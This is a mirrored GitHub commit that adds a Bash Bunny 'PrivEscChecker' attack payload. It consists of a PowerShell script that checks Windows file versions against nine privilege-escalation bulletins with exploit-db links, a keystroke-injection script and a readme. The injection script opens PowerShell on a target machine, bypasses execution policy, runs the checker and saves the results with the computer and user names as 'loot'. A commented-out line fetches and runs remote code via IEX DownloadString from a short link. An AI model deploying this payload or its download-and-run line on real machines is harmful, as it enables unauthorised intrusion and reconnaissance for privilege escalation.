mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
Added browsercreds, wificreds, and mrrobot payloads (#114)
* Initial commit HID Powershell attack to dump WiFiCreds * Update readme.md * changed initial LED blink color to white * Changed initial LED color to white * Changed initial LED Color to white * swapped sync before LED * switched from powershell to batch * Update payload.txt * using powershell again , updated version and LEDs * using powershell, added usb eject, Win 7,8,10 * added window resizing to hide payload typing * Update payload.txt * pull request * BrowserCreds Pull * separate powershell script called from payload also added result detection * update LEDs * Update payload.txt * initial commit * Update payload.txt * initial pull * initial commit
This commit is contained in:
477
payloads/library/PrivEscChecker/Sherlock.ps1
Normal file
477
payloads/library/PrivEscChecker/Sherlock.ps1
Normal file
@@ -0,0 +1,477 @@
|
||||
<#
|
||||
|
||||
File: Sherlock.ps1
|
||||
Author: @_RastaMouse
|
||||
License: GNU General Public License v3.0
|
||||
|
||||
#>
|
||||
|
||||
$Global:ExploitTable = $null
|
||||
|
||||
function Get-FileVersionInfo ($FilePath) {
|
||||
|
||||
$VersionInfo = (Get-Item $FilePath).VersionInfo
|
||||
$FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
|
||||
|
||||
return $FileVersion
|
||||
|
||||
}
|
||||
|
||||
function Get-Architecture {
|
||||
|
||||
# This is the CPU architecture. Returns "64-bit" or "32-bit".
|
||||
$CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
|
||||
|
||||
# This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86".
|
||||
$ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
|
||||
|
||||
return $CPUArchitecture, $ProcessArchitecture
|
||||
|
||||
}
|
||||
|
||||
function New-ExploitTable {
|
||||
|
||||
# Create the table
|
||||
$Global:ExploitTable = New-Object System.Data.DataTable
|
||||
|
||||
# Create the columns
|
||||
$Global:ExploitTable.Columns.Add("Title")
|
||||
$Global:ExploitTable.Columns.Add("MSBulletin")
|
||||
$Global:ExploitTable.Columns.Add("CVEID")
|
||||
$Global:ExploitTable.Columns.Add("Link")
|
||||
$Global:ExploitTable.Columns.Add("VulnStatus")
|
||||
|
||||
# Add the exploits we are interested in.
|
||||
|
||||
# MS10
|
||||
$Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
|
||||
$Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
|
||||
# MS13
|
||||
$Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
|
||||
$Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
|
||||
# MS14
|
||||
$Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
|
||||
# MS15
|
||||
$Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
|
||||
$Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
|
||||
# MS16
|
||||
$Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
|
||||
$Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
|
||||
|
||||
}
|
||||
|
||||
function Set-ExploitTable ($MSBulletin, $VulnStatus) {
|
||||
|
||||
$Global:ExploitTable | Where { $_.MSBulletin -eq $MSBulletin
|
||||
|
||||
} | ForEach-Object {
|
||||
|
||||
$_.VulnStatus = $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function Get-Results {
|
||||
|
||||
$Global:ExploitTable
|
||||
|
||||
}
|
||||
|
||||
function Find-AllVulns {
|
||||
|
||||
if ( !$Global:ExploitTable ) {
|
||||
|
||||
$null = New-ExploitTable
|
||||
|
||||
}
|
||||
|
||||
Find-MS10015
|
||||
Find-MS10092
|
||||
Find-MS13053
|
||||
Find-MS13081
|
||||
Find-MS14058
|
||||
Find-MS15051
|
||||
Find-MS15078
|
||||
Find-MS16016
|
||||
Find-MS16032
|
||||
|
||||
Get-Results
|
||||
|
||||
}
|
||||
|
||||
function Find-MS10015 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS10-015"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# This exploit doesn't work against 64-bit systems
|
||||
if ( $Architecture[0] -eq "64-bit" ) {
|
||||
|
||||
$VulnStatus = "Not supported on 64-bit systems"
|
||||
|
||||
} Else {
|
||||
|
||||
# Get the file version info for 'ntoskrnl.exe'
|
||||
$Path = $env:windir + "\system32\ntoskrnl.exe"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -le "20591" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS10092 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS10-092"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
|
||||
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
|
||||
|
||||
# Get the file version info for 'schedsvc.dll'
|
||||
$Path = $env:windir + "\system32\schedsvc.dll"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -le "20830" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
|
||||
|
||||
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS13053 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS13-053"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# This exploit doesn't work against 64-bit systems
|
||||
if ( $Architecture[0] -eq "64-bit" ) {
|
||||
|
||||
$VulnStatus = "Not supported on 64-bit systems"
|
||||
|
||||
} Else {
|
||||
|
||||
# Get the file version info for 'win32k.sys'
|
||||
$Path = $env:windir + "\system32\win32k.sys"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "17000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "22348" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "20732" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS13081 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS13-081"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# This exploit doesn't work against 64-bit systems
|
||||
if ( $Architecture[0] -eq "64-bit" ) {
|
||||
|
||||
$VulnStatus = "Not supported on 64-bit systems"
|
||||
|
||||
} Else {
|
||||
|
||||
# Get the file version info for 'win32k.sys'
|
||||
$Path = $env:windir + "\system32\win32k.sys"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "22435" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "20807" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS14058 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS14-058"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
|
||||
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
|
||||
|
||||
# Get the file version info for 'win32k.sys'
|
||||
$Path = $env:windir + "\system32\win32k.sys"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
|
||||
|
||||
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS15051 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS15-051"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
|
||||
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
|
||||
|
||||
# Get the file version info for 'win32k.sys'
|
||||
$Path = $env:windir + "\system32\win32k.sys"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
|
||||
|
||||
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS15078 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS15-078"
|
||||
|
||||
# Get the file version info for 'atmfd.dll'
|
||||
$Path = $env:windir + "\system32\atmfd.dll"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(" ")
|
||||
|
||||
# Get the Revision
|
||||
$Revision = $VersionInfo[2]
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Revision ) {
|
||||
|
||||
243 { $VulnStatus = "Appears Vulnerable" }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS16016 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS16-016"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# This exploit doesn't work against 64-bit systems
|
||||
if ( $Architecture[0] -eq "64-bit" ) {
|
||||
|
||||
$VulnStatus = "Not supported on 64-bit systems"
|
||||
|
||||
} Else {
|
||||
|
||||
# Get the file version info for 'mrxdav.sys'
|
||||
$Path = $env:windir + "\system32\drivers\mrxdav.sys"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "23317" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "21738" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9600 { if ( $Revision -le "18189" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
10240 { if ( $Revision -le "16683" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
10586 { if ( $Revision -le "103" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
|
||||
function Find-MS16032 {
|
||||
|
||||
# Set the MS Bulletin
|
||||
$MSBulletin = "MS16-032"
|
||||
|
||||
# Check the system architecture
|
||||
$Architecture = Get-Architecture
|
||||
|
||||
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
|
||||
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
|
||||
|
||||
# Get the file version info for 'seclogon.dll'
|
||||
$Path = $env:windir + "\system32\seclogon.dll"
|
||||
$VersionInfo = Get-FileVersionInfo($Path)
|
||||
|
||||
# Split the string into parts
|
||||
$VersionInfo = $VersionInfo.Split(".")
|
||||
|
||||
# Get the Build and Revision
|
||||
$Build = $VersionInfo[2]
|
||||
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
|
||||
|
||||
# Decide which versions are vulnerable
|
||||
switch ( $Build ) {
|
||||
|
||||
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
|
||||
default { $VulnStatus = "Not Vulnerable" }
|
||||
|
||||
}
|
||||
|
||||
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
|
||||
|
||||
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
|
||||
|
||||
}
|
||||
|
||||
# Update the Exploit Table
|
||||
Set-ExploitTable $MSBulletin $VulnStatus
|
||||
|
||||
}
|
||||
90
payloads/library/PrivEscChecker/payload.txt
Normal file
90
payloads/library/PrivEscChecker/payload.txt
Normal file
@@ -0,0 +1,90 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: PrivEscChecker
|
||||
# Author: illwill
|
||||
# Version: 0.1
|
||||
#
|
||||
# Check Windows box for unpatched vulns that allow privilege escalation
|
||||
# then stashes them in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
|
||||
# Can be used locally or webdls the script from github
|
||||
# Credits to rasta-mouse for their powershell script:
|
||||
# https://github.com/rasta-mouse/Sherlock Sherlock.ps1
|
||||
#
|
||||
# Blue...............Running Script
|
||||
# Purple.............Checking Results
|
||||
# Green..............Found Possible Privilege Escalation
|
||||
# Red................No Possible Privilege Escalation
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||
source bunny_helpers.sh
|
||||
|
||||
LED R 200
|
||||
LOOTDIR=/root/udisk/loot/PrivEscChecker
|
||||
mkdir -p $LOOTDIR
|
||||
#cleanup any prior unfinished payloads
|
||||
rm $LOOTDIR/DONE
|
||||
rm $LOOTDIR/OUTPUT
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING POWERSHELL
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
########################################################################################################################
|
||||
# Check for missing Windows update patches either by downloading or use local file (comment local and uncomment webdl) #
|
||||
########################################################################################################################
|
||||
|
||||
# LOCAL FROM BUNNY
|
||||
Q STRING PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\& \{Import-Module -Name \$Bunny\\payloads\\${SWITCH_POSITION}\\Sherlock.ps1\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt\}\"
|
||||
|
||||
# WEBDL FROM INTERNET
|
||||
# Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nS1L45\'\)\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt
|
||||
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Create a file called DONE with %ComputerName%-%username%
|
||||
Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \$env:computername-\$env:username
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Eject the USB Safely
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
sync
|
||||
#remount the drive and check results
|
||||
LED R B 200
|
||||
sleep 1
|
||||
# Wait for the DONE file to be created so we know powershell is finished
|
||||
LOOTDIR=/root/udisk/loot/PrivEscChecker
|
||||
DONEFILE=$LOOTDIR/DONE
|
||||
while [ ! -e $DONEFILE ]; do sleep .5; done;
|
||||
sleep 1
|
||||
|
||||
# cat %ComputerName%-%username% from DONE as a variable to name folder and then delete
|
||||
DIR=`cat $DONEFILE`
|
||||
mkdir $LOOTDIR/$DIR
|
||||
mv $LOOTDIR/OUTPUT.txt $LOOTDIR/$DIR/OUTPUT.txt
|
||||
rm -f $DONEFILE
|
||||
|
||||
# Check OUTPUT.txt for any missing patches
|
||||
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
|
||||
LED G 200
|
||||
else
|
||||
LED R
|
||||
fi
|
||||
39
payloads/library/PrivEscChecker/readme.md
Normal file
39
payloads/library/PrivEscChecker/readme.md
Normal file
@@ -0,0 +1,39 @@
|
||||
# PrivEscChecker
|
||||
* Author: illwill
|
||||
* Version: Version 0.1
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Checks Windows boxes for unpatched vulns that allow privilege escalation
|
||||
then stores the result in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
|
||||
|
||||
Credits to rasta-mouse for their powershell script:
|
||||
https://github.com/rasta-mouse/Sherlock Sherlock.ps1
|
||||
|
||||
Tested on:
|
||||
+ Windows 7 SP1 32-bit
|
||||
+ Windows 7 SP1 64-bit
|
||||
+ Windows 8 64-bit
|
||||
+ Windows 10 64-bit
|
||||
|
||||
## Configuration
|
||||
|
||||
Option to change payload.txt to webDL the powershell script by commenting line 47 & uncommenting line 50
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Blue (blinking) | Running Powershell script |
|
||||
| Purple (blinking) | Checking Results |
|
||||
| Green (blinking) | Found Possible Privilege Escalation |
|
||||
| Red (solid | No Possible Privilege Escalation |
|
||||
|
||||
## TO-DO
|
||||
Add more priv checks
|
||||
Eventually add https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
|
||||
to check for unquoted paths,dll hijacking, editable services, and other misconfigurations...
|
||||
|
||||
## Discussion
|
||||
https://forums.hak5.org/index.php?/topic/40642-payload-privescchecker/
|
||||
Reference in New Issue
Block a user